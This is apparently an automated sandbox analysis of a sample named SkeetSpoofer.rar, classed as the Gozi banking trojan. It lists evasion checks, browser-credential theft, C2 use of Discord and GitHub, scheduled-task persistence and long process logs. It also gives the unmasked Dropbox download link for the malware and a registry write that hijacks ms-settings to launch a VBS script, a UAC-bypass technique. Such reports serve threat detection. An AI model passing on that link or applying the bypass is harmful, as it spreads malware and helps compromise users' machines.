gozi | hxxps://www[.]dropbox[.]com/scl/fi/bir4c5hd1ur61o8m1iz4j/SkeetSpoofer[.]rar?rlkey=et6977knz7zzyyaxo9h6oooz9&st=3vtwvtbh&dl=0

Analysis

max time kernel
419s
max time network
410s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-05-2024 03:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.dropbox.com/scl/fi/bir4c5hd1ur61o8m1iz4j/SkeetSpoofer.rar?rlkey=et6977knz7zzyyaxo9h6oooz9&st=3vtwvtbh&dl=0

Score

10^/10

gozi banker evasion execution isfb spyware stealer themida trojan

Malware Config

Extracted

Family

gozi

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

SkeetSpoofer.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ SkeetSpoofer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	SkeetSpoofer.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SkeetSpoofer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SkeetSpoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	SkeetSpoofer.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SkeetSpoofer.exewscript.exeskeetresources.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SkeetSpoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	skeetresources.exe

Executes dropped EXE 5 IoCs

Processes:

SkeetSpoofer.exeskeetresources.exegct1wxtq.exeMNRk9gHxWJYAojiqe050MX.exeMNRk9gHxWJYAojiqe050MX.exe

pid process

3276 SkeetSpoofer.exe
664 skeetresources.exe
4148 gct1wxtq.exe
3188 MNRk9gHxWJYAojiqe050MX.exe
3804 MNRk9gHxWJYAojiqe050MX.exe
Loads dropped DLL 1 IoCs

Processes:

skeetresources.exe

pid process

664 skeetresources.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
664	skeetresources.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\SkeetSpoofer\SkeetSpoofer.exe	themida
behavioral1/memory/3276-574-0x0000000000DF0000-0x0000000001642000-memory.dmp	themida
behavioral1/memory/3276-575-0x0000000000DF0000-0x0000000001642000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

SkeetSpoofer.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SkeetSpoofer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	SkeetSpoofer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

Processes:

flow	ioc
159	raw.githubusercontent.com
165	discord.com
181	discord.com
158	raw.githubusercontent.com
164	discord.com
171	discord.com
180	discord.com
199	discord.com
200	discord.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

167 checkip.amazonaws.com

flow	ioc
167	checkip.amazonaws.com

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

SkeetSpoofer.exeMNRk9gHxWJYAojiqe050MX.exeMNRk9gHxWJYAojiqe050MX.exe

pid	process
3276	SkeetSpoofer.exe
3188	MNRk9gHxWJYAojiqe050MX.exe
3188	MNRk9gHxWJYAojiqe050MX.exe
3804	MNRk9gHxWJYAojiqe050MX.exe
3804	MNRk9gHxWJYAojiqe050MX.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4536 powershell.exe
2892 powershell.exe
4292 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2856 schtasks.exe

pid	process
4536	powershell.exe
2892	powershell.exe
4292	powershell.exe

pid	process
2856	schtasks.exe

Enumerates system info in registry 2 TTPs 13 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exeSkeetSpoofer.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	SkeetSpoofer.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SkeetSpoofer.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber = "ZXV8LJH0B2"	SkeetSpoofer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber = "ZPO0D4X3V8"	SkeetSpoofer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber = "V560UFMO7H"	SkeetSpoofer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SkeetSpoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSerialNumber	SkeetSpoofer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

4820 ipconfig.exe

pid	process
4820	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\IESettingSync	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133611673452616705"	chrome.exe

Modifies registry class 13 IoCs

Processes:

Explorer.EXEmsedge.exechrome.exechrome.exeOpenWith.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4124900551-4068476067-3491212533-1000\{8D9C8B9D-8C39-4D01-8644-D045B4034356}	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4124900551-4068476067-3491212533-1000\{53766606-CB2F-475F-B5A7-C43B24E4BDB8}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\jackpear63605335.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exeskeetresources.exegct1wxtq.exe

pid	process
3912	chrome.exe
3912	chrome.exe
1696	chrome.exe
1696	chrome.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
4148	gct1wxtq.exe
4148	gct1wxtq.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe
664	skeetresources.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exeExplorer.EXE

pid process

1392 OpenWith.exe
3508 Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 30 IoCs

Processes:

chrome.exemsedge.exe

pid	process
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe
Token: SeShutdownPrivilege	3912	chrome.exe
Token: SeCreatePagefilePrivilege	3912	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe7zG.exe7zG.exeExplorer.EXEmsedge.exe

pid	process
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3184	7zG.exe
4600	7zG.exe
3912	chrome.exe
3508	Explorer.EXE
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

chrome.exemsedge.exe

pid	process
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
3912	chrome.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe
2256	msedge.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

OpenWith.exegct1wxtq.exeskeetresources.exeMNRk9gHxWJYAojiqe050MX.exeMNRk9gHxWJYAojiqe050MX.exe

pid	process
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
1392	OpenWith.exe
4148	gct1wxtq.exe
664	skeetresources.exe
3188	MNRk9gHxWJYAojiqe050MX.exe
3804	MNRk9gHxWJYAojiqe050MX.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3912 wrote to memory of 4932	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4932	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 4220	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 1924	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 1924	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe
PID 3912 wrote to memory of 3816	3912	chrome.exe	chrome.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.dropbox.com/scl/fi/bir4c5hd1ur61o8m1iz4j/SkeetSpoofer.rar?rlkey=et6977knz7zzyyaxo9h6oooz9&st=3vtwvtbh&dl=0
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9272bab58,0x7ff9272bab68,0x7ff9272bab78
3⤵
PID:4932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:2
3⤵
PID:4220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:1924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:3816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:2732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:4708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4352 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:3196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4328 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
- Modifies registry class
PID:4952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4620 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:1
3⤵
PID:3044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3184 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:3844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 --field-trial-handle=1964,i,14407537852076966141,6157006767868823080,131072 /prefetch:8
3⤵
PID:4684

C:\Program Files\Google\Chrome\Application\chrome.exe
